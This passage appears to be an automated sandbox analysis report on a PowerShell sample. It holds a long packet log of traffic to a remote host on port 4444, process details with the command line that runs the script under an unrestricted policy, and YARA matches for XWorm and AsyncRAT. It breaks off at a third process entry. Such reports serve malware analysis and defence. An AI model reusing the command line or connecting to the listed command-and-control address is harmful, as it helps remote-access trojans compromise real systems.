Jan 28, 2025 12:24:21.634671926 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:21.639403105 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:21.750648975 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:21.758651972 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:21.763834953 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:26.757464886 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:26.762353897 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:26.972359896 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:26.976677895 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:26.981479883 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.101130009 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.105937004 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.132790089 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.137617111 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.210463047 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.215240955 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.373555899 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.375983000 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.380800009 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.494813919 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.497081041 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.501929998 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.615955114 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:27.619294882 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:27.626394987 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:35.882836103 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:35.929414034 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.429112911 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.433955908 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.538487911 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.543430090 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.553936005 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.558748960 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.643538952 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.648693085 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.653445005 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.765522957 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.767213106 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.771992922 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.909468889 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:37.911386013 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:37.916191101 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:42.710256100 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:42.715080976 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:42.757144928 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:42.761951923 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:42.925237894 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:42.927265882 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:42.932157993 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:43.047981977 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:43.050093889 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:43.054956913 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:52.820009947 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:52.824851036 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:52.929516077 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:52.934355974 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:52.944835901 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:52.949698925 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:52.960577965 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:52.965348959 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.035067081 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.040631056 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:53.045458078 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.157468081 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.159266949 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:53.164192915 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.562774897 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.584201097 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:53.589029074 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.738400936 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:53.819456100 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:53.897167921 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:53.902025938 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.085386992 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:25:03.090262890 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.194729090 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:25:03.199856043 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.414632082 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.416899920 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:25:03.421884060 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.422945023 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:03.424967051 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:25:03.471343994 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:25:05.899411917 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
                                            Jan 28, 2025 12:25:06.025312901 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.273092031 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.278253078 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:10.488111973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:10.516865015 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:10.769498110 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.258018017 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:13.262892962 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.511614084 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:13.513921976 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:13.518934965 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.199474096 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:14.205740929 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.415617943 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:14.418720007 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:14.423506975 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.070179939 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:27.075076103 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.367079973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:27.369453907 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:27.374355078 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.163508892 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:34.169064999 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.379297018 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:34.383872032 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:34.389024973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:35.909409046 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:35.960099936 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.226120949 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.231045961 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:41.599607944 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:41.602344036 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:41.607933998 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:42.847016096 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:42.851919889 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:43.064966917 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:43.067711115 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:43.074814081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.429156065 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:45.449965000 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.661132097 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:45.663000107 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:45.667846918 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.307554960 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:58.312817097 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.523391008 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:25:58.525437117 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:25:58.530288935 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:00.960674047 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:00.965668917 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.022994041 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.028028011 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.175746918 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.177247047 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.182045937 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:01.226178885 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:01.585155010 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.194529057 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.217210054 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.217544079 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.217622995 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.217813969 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.218118906 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.219368935 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219398975 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219428062 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.219549894 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.224422932 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.431071043 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:02.433315039 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:02.438229084 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:05.920555115 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:06.085192919 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.194772005 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.202930927 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:12.409871101 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:12.412309885 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:12.417186022 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.022916079 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:13.027909040 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.238106012 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:13.239839077 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:13.248230934 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:17.851758003 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:17.856709957 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:18.066459894 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:18.196356058 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:18.411580086 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:18.416481972 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:24.898181915 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:24.903155088 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:25.113127947 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:25.122064114 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:25.127404928 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.601160049 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.606209993 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.773207903 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.778214931 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.804230928 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.809185028 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.815841913 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.819607019 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.867415905 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.988142967 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:27.991591930 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:27.996439934 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.101591110 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.106719017 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.110625982 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.112229109 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.159267902 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.366899014 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.371942043 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.408775091 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.411006927 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.459286928 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.676942110 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.682055950 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.686899900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:28.882294893 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:28.887126923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:29.097431898 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:29.099404097 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:29.104250908 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.273597002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:31.278615952 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.488902092 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:31.490695953 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:31.495594025 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:33.819943905 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:33.824836969 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:34.035130024 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:34.039594889 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:34.044476032 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:35.928828001 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:36.031552076 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.195602894 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.201817036 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.413378954 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.414880991 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.421138048 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:38.913719893 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:38.918489933 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.107055902 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.112109900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.128238916 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.135435104 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.187978983 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.335985899 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:39.339163065 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:39.344145060 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.101623058 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:40.106765985 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.317483902 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:40.319217920 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:40.324620962 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.304404974 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.311702967 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.335441113 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.342602015 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.366674900 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.373889923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.460725069 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.467880964 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.521752119 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.523711920 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.530035973 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.642322063 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.648494005 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.653537035 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.765402079 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.767663002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.775023937 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.884171009 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:49.887454987 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:49.892433882 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.054271936 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:50.059359074 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.340712070 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:50.343533993 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:50.348860979 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.085597038 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.090501070 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.301254988 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.303232908 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.308096886 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.335635900 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.340498924 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.684756041 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:26:55.686427116 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:26:55.691301107 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.210589886 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:01.217793941 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.425651073 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:01.427397013 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:01.435277939 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:05.948766947 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.007133961 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.554415941 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.562470913 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.632462025 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.637341976 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.769231081 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.770869970 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.776258945 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.891752005 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:06.894141912 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:06.899624109 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.210633039 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:14.215549946 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.425803900 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:14.427797079 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:14.432632923 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.710886002 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:15.715794086 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.926110029 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:27:15.927184105 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:27:15.932112932 CET444449705176.113.115.225192.168.2.8
[CPU usage plot: x-axis 0-200 s, y-axis 0-100 %]

[Memory usage plot: x-axis 0-200 s, y-axis 0-150 MB]

[Process behavior distribution: File, Registry, Network]

                                            Target ID:1
                                            Start time:06:23:06
                                            Start date:28/01/2025
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1"
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:06:23:06
                                            Start date:28/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:06:23:09
